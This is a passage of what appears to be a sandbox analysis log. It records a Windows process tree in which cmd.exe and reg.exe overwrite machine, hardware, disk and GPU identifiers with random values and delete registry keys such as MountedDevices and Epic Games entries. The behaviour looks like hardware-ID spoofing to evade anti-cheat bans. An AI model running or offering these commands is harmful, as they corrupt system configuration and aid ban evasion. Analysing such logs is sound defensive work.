      reg delete HKLM\System\CurrentControlSet\Control\TimeZoneInformation /f
      4⤵
      PID:4472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWAREMicrosoft\Windows" "NT\CurrentVersion\Notifications\Data /v 418A073AA3BC3475 /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:1752
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWAREMicrosoft\Windows" "NT\CurrentVersion\Notifications\Data /v 418A073AA3BC3475 /t REG_BINARY /d 20507863985081464848241291123219264988241186811781123717 /f
      4⤵
      Modifies registry key
      PID:6076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 /f
    3⤵
    PID:5944
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 /f
      4⤵
      Checks processor information in registry
      PID:5820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKCU\Software\Microsoft\Direct3D /v WHQLClass /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:336
  - - C:\Windows\system32\reg.exe
      REG ADD HKCU\Software\Microsoft\Direct3D /v WHQLClass /t REG_BINARY /d 20507863985081464848241291123219264988241186811781123717 /f
      4⤵
      PID:4832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d DESKTOP-%random% /f
    3⤵
    PID:4804
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d DESKTOP-20507 /f
      4⤵
      PID:3772
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d DESKTOP-%random% /f
    3⤵
    PID:620
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d DESKTOP-20507 /f
      4⤵
      Modifies registry key
      PID:2388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d Paste%random%-%random%-%random%-%random% /f
    3⤵
    PID:6032
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d Paste20507-8639-8508-14648 /f
      4⤵
      PID:836
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\HardwareConfig /v LastConfig /t REG_SZ /d {Paste-%random%-%random} /f
    3⤵
    PID:3612
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\HardwareConfig /v LastConfig /t REG_SZ /d {Paste-20507-%random} /f
      4⤵
      PID:4224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\HardwareConfig\Current /v BaseBoardProduct /t REG_SZ /d Paste-%random%%random%%random% /f
    3⤵
    PID:4732
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\HardwareConfig\Current /v BaseBoardProduct /t REG_SZ /d Paste-2050786398508 /f
      4⤵
      Modifies registry key
      PID:5252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLab /t REG_SZ /d Paste-%random% /f
    3⤵
    PID:216
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLab /t REG_SZ /d Paste-20507 /f
      4⤵
      Modifies registry key
      PID:3192
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLabEx /t REG_SZ /d Paste-%random% /f
    3⤵
    PID:4320
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLabEx /t REG_SZ /d Paste-20507 /f
      4⤵
      PID:6020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DESCRIPTION\System\BIOS /v BaseBoardProduct /t REG_SZ /d Paste-%random%%random%%random% /f
    3⤵
    PID:1652
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\HARDWARE\DESCRIPTION\System\BIOS /v BaseBoardProduct /t REG_SZ /d Paste-2050786398508 /f
      4⤵
      Enumerates system info in registry
      PID:1208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\ControlSet001\Services\kbdclass\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {Paste-%random%-%random%-%random%%random%} /f
    3⤵
    PID:2364
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\ControlSet001\Services\kbdclass\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {Paste-20507-8639-850814648} /f
      4⤵
      PID:3428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\ControlSet001\Services\mouhid\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {Paste-%random%-%random%-%random%%random%} /f
    3⤵
    PID:4736
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\ControlSet001\Services\mouhid\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {Paste-20507-8639-850814648} /f
      4⤵
      PID:3844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v UserModeDriverGUID /t REG_SZ /d {Paste-%random%-%random%-%random%%random%} /f
    3⤵
    PID:4420
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v UserModeDriverGUID /t REG_SZ /d {Paste-20507-8639-850814648} /f
      4⤵
      PID:3148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildBranch /t REG_SZ /d Paste-%random%-%random%-%random%%random% /f
    3⤵
    PID:3480
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildBranch /t REG_SZ /d Paste-20507-8639-850814648 /f
      4⤵
      PID:5068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d Paste-%random%-%random%-%random%%random% /f
    3⤵
    PID:4468
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d Paste-20507-8639-850814648 /f
      4⤵
      PID:2628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildLab /t REG_SZ /d Paste-%random%-%random%-%random%%random% /f
    3⤵
    PID:1544
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildLab /t REG_SZ /d Paste-20507-8639-850814648 /f
      4⤵
      PID:2872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "0\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d Paste-%random%-%random%-%random%%random% /f
    3⤵
    PID:872
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "0\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d Paste-20507-8639-850814648 /f
      4⤵
      PID:4956
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "1\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d Paste-%random%-%random%-%random%%random% /f
    3⤵
    PID:4680
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "1\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d Paste-20507-8639-850814648 /f
      4⤵
      Modifies registry key
      PID:4136
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 /v Identifier /t REG_SZ /d Paste-%random%-%random%-%random%%random% /f
    3⤵
    PID:3548
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 /v Identifier /t REG_SZ /d Paste-20510-19387-263735943 /f
      4⤵
      Enumerates system info in registry
      PID:6000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 /v Identifier /t REG_SZ /d Paste-%random%-%random%-%random%%random% /f
    3⤵
    PID:3964
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 /v Identifier /t REG_SZ /d Paste-20510-19387-263735943 /f
      4⤵
      Enumerates system info in registry
      Modifies registry key
      PID:3612
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\ControlSet001\Services\BasicDisplay\Video /v VideoID /t REG_SZ /d {Paste-%random%-%random%-%random%%random%} /f
    3⤵
    PID:2844
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\ControlSet001\Services\BasicDisplay\Video /v VideoID /t REG_SZ /d {Paste-20510-19387-263735943} /f
      4⤵
      PID:5080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {Paste-%random%-%random%-%random%%random%} /f
    3⤵
    PID:5396
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {Paste-20510-19387-263735943} /f
      4⤵
      PID:5588
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v Hostname /t REG_SZ /d DESKTOP-%random% /f
    3⤵
    PID:5408
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v Hostname /t REG_SZ /d DESKTOP-20510 /f
      4⤵
      PID:4320
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\System\CurrentControlSet\Services\Tcpip\Parameters /v Domain /t REG_SZ /d %random% /f
    3⤵
    PID:308
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\System\CurrentControlSet\Services\Tcpip\Parameters /v Domain /t REG_SZ /d 20510 /f
      4⤵
      PID:4432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\System\CurrentControlSet\Control\DevQuery\6 /v UUID /t REG_SZ /d %random% /f
    3⤵
    PID:6024
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\System\CurrentControlSet\Control\DevQuery\6 /v UUID /t REG_SZ /d 20510 /f
      4⤵
      PID:3844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v NV" "Hostname /t REG_SZ /d DESKTOP-%random% /f
    3⤵
    PID:1664
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v NV" "Hostname /t REG_SZ /d DESKTOP-20510 /f
      4⤵
      PID:5284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {Paste%random%-%random%-%random%-%random%%random%} /f
    3⤵
    PID:5856
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {Paste20510-19387-26373-594315139} /f
      4⤵
      PID:4176
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v GUID /t REG_SZ /d {Paste%random%-%random%-%random%-%random%%random%} /f
    3⤵
    PID:5608
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v GUID /t REG_SZ /d {Paste20510-19387-26373-594315139} /f
      4⤵
      PID:1328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d %random% /f
    3⤵
    PID:4468
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d 20513 /f
      4⤵
      PID:5944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v REGisteredOwner /t REG_SZ /d %random% /f
    3⤵
    PID:872
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v REGisteredOwner /t REG_SZ /d 20513 /f
      4⤵
      PID:4136
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v REGisteredOrganization /t REG_SZ /d %random% /f
    3⤵
    PID:836
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v REGisteredOrganization /t REG_SZ /d 20513 /f
      4⤵
      PID:5556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v GUID /t REG_SZ /d %random%-%random%-%random%-%random% /f
    3⤵
    PID:4224
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v GUID /t REG_SZ /d 20513-30136-11469-30006 /f
      4⤵
      PID:4888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d Paste%random%-%random%-%random%-%random% /f
    3⤵
    PID:5396
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d Paste20513-30136-11469-30006 /f
      4⤵
      PID:5480
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v ProductId /t REG_SZ /d Paste%random%-%random%-%random%-%random% /f
    3⤵
    PID:3844
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v ProductId /t REG_SZ /d Paste20517-8116-29333-21302 /f
      4⤵
      Modifies registry key
      PID:6024
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_SZ /d Paste%random% /f
    3⤵
    PID:5808
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_SZ /d Paste20517 /f
      4⤵
      PID:5736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_SZ /d %random% /f
    3⤵
    PID:2964
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_SZ /d 20517 /f
      4⤵
      Modifies registry key
      PID:3480
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildLabEx /t REG_SZ /d %random% /f
    3⤵
    PID:4472
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildLabEx /t REG_SZ /d 20517 /f
      4⤵
      PID:2628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {Paste%random%-%random%-%random%-%random%} /f
    3⤵
    PID:5932
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {Paste20517-8116-29333-21302} /f
      4⤵
      Modifies registry key
      PID:2872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG delete HKCU\Software\Epic" "Games /f
    3⤵
    PID:4456
  - - C:\Windows\system32\reg.exe
      REG delete HKCU\Software\Epic" "Games /f
      4⤵
      Modifies registry key
      PID:4136
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Tracing\Microsoft\Profile\Profile /v Guid /t REG_SZ /d %random%-%random%-%random%-%random%%random% /f
    3⤵
    PID:6056
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Tracing\Microsoft\Profile\Profile /v Guid /t REG_SZ /d 20517-8116-29333-213023000 /f
      4⤵
      Modifies registry key
      PID:5324
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Classes\com.epicgames.launcher /f
    3⤵
    PID:5940
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Classes\com.epicgames.launcher /f
      4⤵
      PID:5616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\WOW6432Node\EpicGames /f
    3⤵
    PID:2832
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\WOW6432Node\EpicGames /f
      4⤵
      PID:3952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\WOW6432Node\Epic" "Games /f
    3⤵
    PID:3964
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\WOW6432Node\Epic" "Games /f
      4⤵
      Modifies registry key
      PID:1984
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCR\com.epicgames.launcher /f
    3⤵
    PID:4172
  - - C:\Windows\system32\reg.exe
      reg delete HKCR\com.epicgames.launcher /f
      4⤵
      PID:5480
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\MountedDevices /f
    3⤵
    PID:3288
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\MountedDevices /f
      4⤵
      Modifies registry key
      PID:5544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f
    3⤵
    PID:1664
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f
      4⤵
      PID:828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f
    3⤵
    PID:1648
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f
      4⤵
      PID:1528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f
    3⤵
    PID:5536
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f
      4⤵
      PID:3824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f
    3⤵
    PID:1960
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f
      4⤵
      PID:4676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\LastEnum /f
    3⤵
    PID:2292
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\LastEnum /f
      4⤵
      Modifies registry key
      PID:1060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v AccountDomainSid /t REG_SZ /d Paste-%random%-%random%-%random%%random% /f
    3⤵
    PID:1512
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v AccountDomainSid /t REG_SZ /d Paste-20520-18864-1442912597 /f
      4⤵
      Modifies registry key
      PID:2428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v PingID /t REG_SZ /d Paste-%random%-%random%-%random%%random% /f
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:2840
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v PingID /t REG_SZ /d Paste-20520-18864-1442912597 /f
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      PID:2296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d Paste-%random%-%random%-%random%%random% /f
    3⤵
    PID:3252
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d Paste-20520-18864-1442912597 /f
      4⤵
      PID:4092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v SMBiosData /f
    3⤵
    PID:4176
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v SMBiosData /f
      4⤵
      PID:5472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v ClientUUID /t REG_SZ /d Paste-%random%-%random%-%random%%random% /f
    3⤵
    PID:3480
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v ClientUUID /t REG_SZ /d Paste-20520-18864-1442912597 /f
      4⤵
      Modifies registry key
      PID:2964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v PersistenceIdentifier /t REG_SZ /d Paste-%random%-%random%-%random%%random% /f
    3⤵
    PID:628
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v PersistenceIdentifier /t REG_SZ /d Paste-20520-18864-1442912597 /f
      4⤵
      Modifies registry key
      PID:5068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global\CoProcManager /v ChipsetMatchID /t REG_SZ /d Paste-%random%-%random%-%random%%random% /f
    3⤵
    PID:164
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global\CoProcManager /v ChipsetMatchID /t REG_SZ /d Paste-20520-18864-1442912597 /f
      4⤵
      PID:840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\MountedDevices /f
    3⤵
    PID:4100
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\MountedDevices /f
      4⤵
      Modifies registry key
      PID:336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\com.epicgames.launcher /f
    3⤵
    PID:3940
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\com.epicgames.launcher /f
      4⤵
      Modifies registry key
      PID:4404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f
    3⤵
    PID:4592
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f
      4⤵
      PID:872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f
    3⤵
    PID:5992
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f
      4⤵
      Modifies registry key
      PID:5784
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f
    3⤵
    PID:3952
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f
      4⤵
      PID:2832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f
    3⤵
    PID:4408
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f
      4⤵
      PID:4760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket /v LastEnum /f
    3⤵
    PID:5408
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket /v LastEnum /f
      4⤵
      PID:4360
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKCU\Software\Classes\Interface /v ClsidStore /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:2300
  - - C:\Windows\system32\reg.exe
      REG ADD HKCU\Software\Classes\Interface /v ClsidStore /t REG_BINARY /d 2052018864144291259713315286182900147898752268571721923893 /f
      4⤵
      PID:836
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d Paste-%random%-%random%-%random%%random% /f
    3⤵
    PID:3288
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d Paste-20520-18864-1442912597 /f
      4⤵
      PID:2936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d Paste-%random%-%random%-%random%%random% /f
    3⤵
    PID:4856
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d Paste-20523-29613-322933892 /f
      4⤵
      PID:3844
- - C:\Windows\system32\cmd.exe
